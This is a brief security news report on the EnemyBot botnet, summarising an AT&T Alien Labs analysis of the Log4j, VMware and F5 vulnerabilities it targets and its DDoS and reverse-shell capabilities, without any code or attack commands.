EnemyBot malware botnet expanding its target list with recently-discovered vulnerabilities in F5 hardware and VMware software.
Initially discovered in March 2022, EnemyBot’s original target was the wide range of Linux variants used in IoT devices. But the recent analysis released by AT&T Alien Labs showed EnemyBot is launching attacks against a number of most recent vulnerabilities in content management systems, web servers, F5 hardware, and VMware software.
There’s quite a list of targets in the AT&T analysis, with the high-profile Log4j remote code execution (RCE) vulnerabilities from last year (CVE-2021-44228 and CVE-2021-45046), a VMware Workspace ONE vulnerability (CVE-2022-22954) discovered in April, and a REST vulnerability in F5’s BIG-IP application delivery server (CVE-2022-1388) published in May.
Nine of the vulnerabilities, including several in WordPress plugins and one in Adobe ColdFusion 11 discovered in February, have no CVE assigned.
If EnemyBot successfully infects a target, it will try to find other vulnerable hosts to infect.
Its C&C servers can also invoke a range of commands on EnemyBot, including various DDoS tools, shell commands, reverse shell creation, and a TLS attack. It will also try to infect Android devices connected through the USB port.
Indicators of Compromise